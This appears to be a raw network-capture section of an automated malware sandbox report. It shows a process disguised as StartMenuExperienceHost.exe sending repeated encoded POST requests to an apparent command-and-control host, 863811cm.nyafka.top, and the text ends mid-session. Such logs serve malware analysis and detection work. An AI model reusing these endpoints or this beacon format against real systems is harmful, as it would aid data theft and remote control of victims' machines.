                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuxxWbmEMQ1coWEpaFoinos%2BCWwvLqYEgNXHWY%2BdXSFXFmnDJj%2BYQYuq6vZ4djbzEnCRPEOQBQR0jaJC%2BYrjSMqOpnHHWkboVrgtGpF8oNTSBvo4YB3HVSX0yyfgZQli0Kt42UAG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f365fd78c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 28 29 3e 1d 23 10 0d 5a 3b 0f 0e 13 3e 2e 3e 5d 2b 31 09 58 32 24 30 05 2d 05 29 57 21 2b 2b 01 3e 3f 2a 1c 27 02 05 58 28 31 2a 51 03 1b 39 13 3f 30 2c 09 2b 54 29 14 3c 0b 3d 5d 30 0d 14 1a 3d 5b 35 1f 30 3d 31 07 21 31 01 0c 28 2c 09 52 38 2b 3f 43 3e 06 08 5a 34 01 2a 5f 08 13 39 13 2a 2b 23 08 35 09 08 04 21 2e 38 0d 22 39 25 0a 3d 5f 31 0d 30 30 20 59 3b 32 38 5a 34 01 01 57 22 02 36 55 20 3d 30 59 31 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98']()>#Z;>.>]+1X2$0-)W!++>?*'X(1*Q9?0,+T)<=]0=[50=1!1(,R8+?C>Z4*_9*+#5!.8"9%=_100 Y;28Z4W"6U =0Y18"_")Q?TR0
                                                                Oct 11, 2024 01:36:46.270205021 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:46.364526033 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:46.621062994 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWiue7bM2q1xEnpiycYjCnzzqUIdK7YdxVl3aFF48Qg8sKVucM%2Fz49hkjBwflmy3jA59ps1eqBWhf9lwuhRNWLrBMpfFXWLhy3cBnz48OKQidoJcdlyBlnB972fZEXIf7G2pdh6p"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f397c7a8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 28 39 0f 0e 20 2d 2b 5d 2f 31 2f 02 3d 3d 22 16 29 21 37 58 25 1d 27 5d 3a 5a 25 56 22 2b 3f 00 29 5a 3d 03 33 2c 2c 01 3f 1b 2a 51 03 1b 39 11 3f 55 2b 1c 2b 31 35 5a 2b 0b 25 5f 30 1d 31 43 3e 04 29 57 25 2d 3e 59 35 57 3b 0b 3e 3c 02 0d 2c 3b 27 45 3d 06 32 58 20 3b 2a 5f 08 13 3a 0d 28 38 2c 51 21 37 0f 58 21 13 11 1f 22 2a 26 19 3f 2a 32 55 33 1d 01 00 2f 54 3c 13 37 3f 2f 1c 21 3f 21 0a 20 03 2f 03 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$(9 -+]/1/==")!7X%']:Z%V"+?)Z=3,,?*Q9?U++15Z+%_01C>)W%->Y5W;><,;'E=2X ;*_:(8,Q!7X!"*&?*2U3/T<7?/!?! /%"_")Q?TR0
                                                                Oct 11, 2024 01:36:46.723270893 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1980
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:46.962182999 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:47.263190985 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cd5%2Bl83PM%2BJ8rn%2FxAMmtBpO7odsTebEHU2OoRw6goB9sMzJ4ltVDBY0VRZ9UyZD9L2p72la7RThsvRyQrqcvBZT8SNUlffPUJdrZvic6IEqUXqOhNQHUiwlCVd7OVVkvDdSLVWM6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f3c5ff78c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 2a 17 25 0e 22 3d 37 59 2c 22 24 58 29 5b 3a 5f 3f 0f 09 13 25 42 27 17 2d 12 29 53 23 2b 24 5f 28 3c 29 03 30 12 01 11 28 0b 2a 51 03 1b 3a 02 3f 20 27 57 28 1c 31 5e 29 21 3d 5e 30 0a 25 44 2b 2e 2d 54 24 10 0c 14 21 57 37 0b 3e 5a 3c 0e 2f 3b 2f 44 3e 3b 3a 11 34 2b 2a 5f 08 13 3a 0f 3e 16 0e 57 22 19 07 58 22 04 2b 1f 22 5f 26 14 3d 3a 25 0d 30 33 23 05 2d 32 37 06 20 3c 2c 0d 22 3c 32 1e 20 03 20 5b 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*%"=7Y,"$X)[:_?%B'-)S#+$_(<)0(*Q:? 'W(1^)!=^0%D+.-T$!W7>Z</;/D>;:4+*_:>W"X"+"_&=:%03#-27 <,"<2 [&("_")Q?TR0
                                                                Oct 11, 2024 01:36:47.379784107 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:47.474565029 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:47.770941973 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hjsAnTVU8NkYHbe6wl%2FnihyyaJddvyfBHaS6gsgk9fc804n%2FbvsscVPw7%2FFi%2BiNuGeTBM0XnZxhUMBvLCloFihuuqnYr0THU7lj%2FyCpNvhxjmNAJJZP1MbW42ddWyFDU7ZBuSyic"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f406d468c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 29 07 0c 54 22 2e 01 58 2c 22 27 02 3d 5b 22 5f 3c 32 34 00 31 1a 38 07 39 2f 3a 0f 22 15 3c 5d 3e 02 26 5a 26 3c 37 1f 3f 1b 2a 51 03 1b 39 1c 28 55 30 0d 2b 1c 22 03 3c 22 2d 1a 33 20 36 1d 3e 3d 31 1c 30 00 22 5e 22 31 2f 0f 2a 3c 0d 10 3b 02 3c 1d 3d 06 3a 5b 23 3b 2a 5f 08 13 39 55 2a 06 0e 1c 36 37 22 07 21 04 2b 1f 22 00 29 08 3e 2a 3e 1d 27 0a 38 5f 2c 32 2c 13 20 2f 28 0f 35 02 0b 0c 21 2d 01 03 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$)T".X,"'=["_<24189/:"<]>&Z&<7?*Q9(U0+"<"-3 6>=10"^"1/*<;<=:[#;*_9U*67"!+")>*>'8_,2, /(5!-%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.549838188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:38.898224115 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:39.254156113 CEST2584OUTData Raw: 50 5a 58 5d 51 5b 58 55 5e 5a 55 58 51 52 5a 5e 57 59 58 5e 55 5c 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZX]Q[XU^ZUXQRZ^WYX^U\Q^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^+\(8%>$*%<\"8#X(7$+S0:)+8F!+*#Y$/\*
                                                                Oct 11, 2024 01:36:39.340873003 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:39.590240002 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ikHCLoDM6feTaHoSgito8WA5hcBCzF0bIws3cjDus9momnGjjp5nOb4M%2B4N76cZ1VjQm09Qg8asuGmsvSLb5m%2BzWP5T30CRIlJPxkToDHdmH%2BgXIzTI1iUy8ErhMk9nb6YX8EVic"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f0d986d8c57-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.549844188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:39.709759951 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:40.066659927 CEST2584OUTData Raw: 55 5e 58 59 54 54 5d 54 5e 5a 55 58 51 52 5a 5b 57 50 58 5b 55 52 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^XYTT]T^ZUXQRZ[WPX[URQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:)=[<#S%X,?5+"]??%!7$0=)(;$F""#*#Y$/\*
                                                                Oct 11, 2024 01:36:40.155514956 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:40.401849985 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sGw%2FvGaG8wGZP1NwiFBJZQTDyGQB4dT1dysjC7WNRz2TsbKqFE3cWQ7JMmrqrY95S6X4gfHv%2FMWRtqd%2FEzIg2YUbL2R2UxJDc%2FTEVZav6JA8t3vMMA7%2FRDUNEj3jWCf0sBYyNJZP"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f12adce425e-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.549850188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:40.716912985 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:41.066626072 CEST2584OUTData Raw: 50 53 5d 5b 51 58 58 5e 5e 5a 55 58 51 54 5a 5e 57 5e 58 5c 55 5c 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS][QXX^^ZUXQTZ^W^X\U\QZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+$Y>*32.+$Y!+\?U9!7#3=&=8 ! ^>#Y$/\*%
                                                                Oct 11, 2024 01:36:41.162638903 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:41.406508923 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UB%2FjA5k5pgb1trLup1KVHZfIz9dU5tEtFFwlcuL8teVVVdVFOQPOTdZICaRNJhMCSaF9ek2UFKGcivd%2BWbjqmmylNq4KGVu1ORjeK0vU2YO03SvPXc5mnwP64sTHIaVQjo4CTpWB"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f18ff7878e2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.549861188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:41.535464048 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:41.894838095 CEST2584OUTData Raw: 55 58 5d 5d 54 5c 58 54 5e 5a 55 58 51 52 5a 5c 57 59 58 5f 55 52 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UX]]T\XT^ZUXQRZ\WYX_URQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:)-0Y(R'>8<0"]?]<#57B(0[.)^<F620)+#Y$/\*
                                                                Oct 11, 2024 01:36:41.990338087 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:42.241554976 CEST596INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Md8HzFM895apYUCKU%2FqFCFdT0JIzdmhBFpTaB5Gposseyi%2BKzl9eRkOS0CiRXmrbOqPVhdqxhLAbg00hrkK%2FgufHLL%2BmcllI1Y7w2E8HxDPEEPN35u2%2BmfwTohj4U1qvhPzPe%2Fd1"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f1e2c9f43d3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:36:42.330290079 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.549867188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:42.459227085 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:42.816699982 CEST2584OUTData Raw: 50 5e 5d 59 54 55 58 50 5e 5a 55 58 51 51 5a 5a 57 50 58 59 55 51 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]YTUXP^ZUXQQZZWPXYUQQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9((<<&><%,\";']+37'''=9S)(G"=#Y$/\*1
                                                                Oct 11, 2024 01:36:42.905380011 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:43.167165041 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rSzWDPWVGrBEP7ow%2Bg6DFdcW2Oya%2FA8Af6ptaIqNQUHlBeyIW2s0Ohq%2Flf9dpqkTlcse71ufAFfmUEKrO2zZI7nWSw3XmHJYS6YovB2XySoXscSzA1IGul3mYqFdxip1DrbXsWhI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f23d8308ca2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.549873188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:43.494260073 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:43.847786903 CEST2584OUTData Raw: 55 5f 58 59 51 5f 58 57 5e 5a 55 58 51 57 5a 58 57 59 58 5e 55 5c 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_XYQ_XW^ZUXQWZXWYX^U\Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<>*8&=0D<<!;<#=T!'<$(+$!W<Y*;#Y$/\*)
                                                                Oct 11, 2024 01:36:43.943479061 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:44.194454908 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TdoD%2BwzCpDFZgCq3%2B2MxzBqF6Jw4idNmxQRtEZwnl28HkAjI4xMTuPHLEywfPIQeHqXU1slWC7%2BDqLE5VHuGX3IqIh8YDOLJjnoaS8n%2Fvsa5uqG0W%2F3UEQSFmczWyZObylFncJqg"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f2a5f597d1c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.549878188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:44.318892956 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:44.676076889 CEST2584OUTData Raw: 50 58 5d 59 54 5b 58 50 5e 5a 55 58 51 5d 5a 5d 57 5d 58 54 55 57 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]YT[XP^ZUXQ]Z]W]XTUWQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<> [+'R2><<Y!]'Y+U*7?$>-V=+?"!8>;#Y$/\*
                                                                Oct 11, 2024 01:36:44.784035921 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:45.043194056 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpPwvfJc9GJNGOJr58Efk%2BxpjeI%2F8qGWfgBBG%2Fb6dksrUuQgXGpY4XlxzQfc6fxhNJqK1jqWhQJV5nHXzq8HefY3DtEHroKHhRMFY2USrlBi0saN2tL7G7KnLmdKxCsiJsYpF%2Btu"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f2f9f3442e6-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.549883188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:45.167375088 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:45.519884109 CEST2584OUTData Raw: 50 59 5d 5f 51 5c 5d 53 5e 5a 55 58 51 53 5a 58 57 50 58 5a 55 50 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
